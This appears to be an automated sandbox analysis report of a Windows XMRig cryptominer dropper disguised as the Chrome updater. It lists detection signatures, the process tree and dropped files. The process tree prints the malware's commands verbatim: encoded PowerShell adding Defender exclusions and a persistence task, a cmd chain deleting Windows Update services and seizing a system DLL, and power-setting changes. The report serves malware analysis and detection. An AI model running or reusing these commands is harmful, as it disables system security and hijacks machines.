Analysis
-
max time kernel
300s -
max time network
290s -
platform
windows10-1703_x64 -
resource
win10-20220722-en -
resource tags
-
submitted
03-08-2022 22:15
General
-
Target
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe
-
Size
7.1MB
-
MD5
322cf2f6a67420e4eb53f29263a639ba
-
SHA1
bc91f56c260ff4484f7fb0d33a3d351d3d812781
-
SHA256
1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
-
SHA512
3e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 6 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Modifies file permissions 1 TTPs 4 IoCs
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBhAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZwBuACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdAB2ACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEcANABBAGUAZwBCAGkAQQBIAEEAQQBJAHcAQQArAEEAQwBBAEEAVQB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDADAAQQBVAEEAQgB5AEEARwA4AEEAWQB3AEIAbABBAEgATQBBAGMAdwBBAGcAQQBDADAAQQBSAGcAQgBwAEEARwB3AEEAWgBRAEIAUQBBAEcARQBBAGQAQQBCAG8AQQBDAEEAQQBKAHcAQgBEAEEARABvAEEAWABBAEIAUQBBAEgASQBBAGIAdwBCAG4AQQBIAEkAQQBZAFEAQgB0AEEAQwBBAEEAUgBnAEIAcABBAEcAdwBBAFoAUQBCAHoAQQBGAHcAQQBSAHcAQgB2AEEARwA4AEEAWgB3AEIAcwBBAEcAVQBBAFgAQQBCAEQAQQBHAGcAQQBjAGcAQgB2AEEARwAwAEEAWgBRAEIAYwBBAEgAVQBBAGMAQQBCAGsAQQBHAEUAQQBkAEEAQgBsAEEASABJAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAaQBBAEMAQQBBAFUAZwBCADEAQQBHADQAQQBRAFEAQgB6AEEAQwBBAEEAUABBAEEAagBBAEcATQBBAGUAUQBCADYAQQBDAE0AQQBQAGcAQQA9ACIAJwApACAAPAAjAHoAZAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAG0AcQBoACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAbABmAG4AIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBqAGIAaQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAZQAxADIANABiAGYAZQA0ADUANAA1ADEAMgA2ADcAMQBkADYANQBmADgANQA0AGMAMABjAGMAZgAzAGEAZQA5ADIAYgA3ADMAYQBlADAAOAA0ADAANQAwAGQAYgA0ADMAOQBlADcAMAA5AGEAYwA2ADMAMQAyADkAMAAyADUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAGUAYgAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdAB6AHEAeQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAG4AegBiAHAAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAGMAeQB6ACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBhAHgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZwBuACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "przhttndp"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe vyqrgnmarui1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8Ush6VLBdnMAvFLywM+oNSpyK7wZGKNjvWUFQPU9e9Qm4⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD5322cf2f6a67420e4eb53f29263a639ba
SHA1bc91f56c260ff4484f7fb0d33a3d351d3d812781
SHA2561e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
SHA5123e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD5322cf2f6a67420e4eb53f29263a639ba
SHA1bc91f56c260ff4484f7fb0d33a3d351d3d812781
SHA2561e124bfe454512671d65f854c0ccf3ae92b73ae084050db439e709ac63129025
SHA5123e58b83f26950059901ad1cbb20a06351b7a815d17a3e65a0a84061b7d0d9af588a2685786c28642b1bb76575c81b272d10a1b1dede515b643b27ea52deadcc7
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5de77cc09c8792b9d60e614a37574ee16
SHA1c396158bb7c7fd8e3cc809a50da03d0026ead622
SHA256268eafb9fc5a90782f54ab8476c919359b3b3924ee3bdbd5e2d1c20d6dd748cd
SHA51270ae07c8fe3e4c8d176efd380e90c470fa6e58e4e8ca4d804a854fe388fa93f054a151d66ba9d336b3ca7e3a1183008f2978f3fbd23ab8e0489cc4fc236a1329
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e2d46bffd1d9300639cac360fac02cb4
SHA1fd2b4813c8ab610294b6759192ca05bad5bb8958
SHA25694ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
SHA51254b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/384-449-0x0000000000000000-mapping.dmp
-
memory/432-446-0x0000000000000000-mapping.dmp
-
memory/632-459-0x0000000000000000-mapping.dmp
-
memory/652-456-0x0000000000000000-mapping.dmp
-
memory/788-440-0x0000000000000000-mapping.dmp
-
memory/820-447-0x0000000000000000-mapping.dmp
-
memory/868-448-0x0000000000000000-mapping.dmp
-
memory/928-457-0x0000000000000000-mapping.dmp
-
memory/1028-450-0x0000000000000000-mapping.dmp
-
memory/1068-451-0x0000000000000000-mapping.dmp
-
memory/1168-452-0x0000000000000000-mapping.dmp
-
memory/1224-187-0x0000000000000000-mapping.dmp
-
memory/1276-455-0x0000000000000000-mapping.dmp
-
memory/1304-280-0x0000000000400000-0x000000000106F000-memory.dmpFilesize
12.4MB
-
memory/1304-275-0x0000000000400000-0x000000000106F000-memory.dmpFilesize
12.4MB
-
memory/1304-272-0x0000000000000000-mapping.dmp
-
memory/1304-276-0x0000000000400000-0x000000000106F000-memory.dmpFilesize
12.4MB
-
memory/1304-277-0x00007FF963120000-0x00007FF9632FB000-memory.dmpFilesize
1.9MB
-
memory/1304-281-0x00007FF963120000-0x00007FF9632FB000-memory.dmpFilesize
1.9MB
-
memory/1448-443-0x0000000000000000-mapping.dmp
-
memory/1464-482-0x0000000000000000-mapping.dmp
-
memory/1648-483-0x0000000000000000-mapping.dmp
-
memory/1648-257-0x0000000000000000-mapping.dmp
-
memory/1668-258-0x0000000000000000-mapping.dmp
-
memory/1748-197-0x0000000000000000-mapping.dmp
-
memory/1748-439-0x0000000000000000-mapping.dmp
-
memory/1772-480-0x0000000000000000-mapping.dmp
-
memory/1780-256-0x0000000000000000-mapping.dmp
-
memory/1916-189-0x0000000000000000-mapping.dmp
-
memory/1964-188-0x0000000000000000-mapping.dmp
-
memory/2148-255-0x0000000000000000-mapping.dmp
-
memory/2300-454-0x0000000000000000-mapping.dmp
-
memory/2332-481-0x0000000000000000-mapping.dmp
-
memory/2344-264-0x0000000000000000-mapping.dmp
-
memory/2396-198-0x0000000000000000-mapping.dmp
-
memory/2480-484-0x0000000000000000-mapping.dmp
-
memory/2540-263-0x0000000000000000-mapping.dmp
-
memory/2740-485-0x0000000000000000-mapping.dmp
-
memory/2764-259-0x0000000000000000-mapping.dmp
-
memory/2768-260-0x0000000000000000-mapping.dmp
-
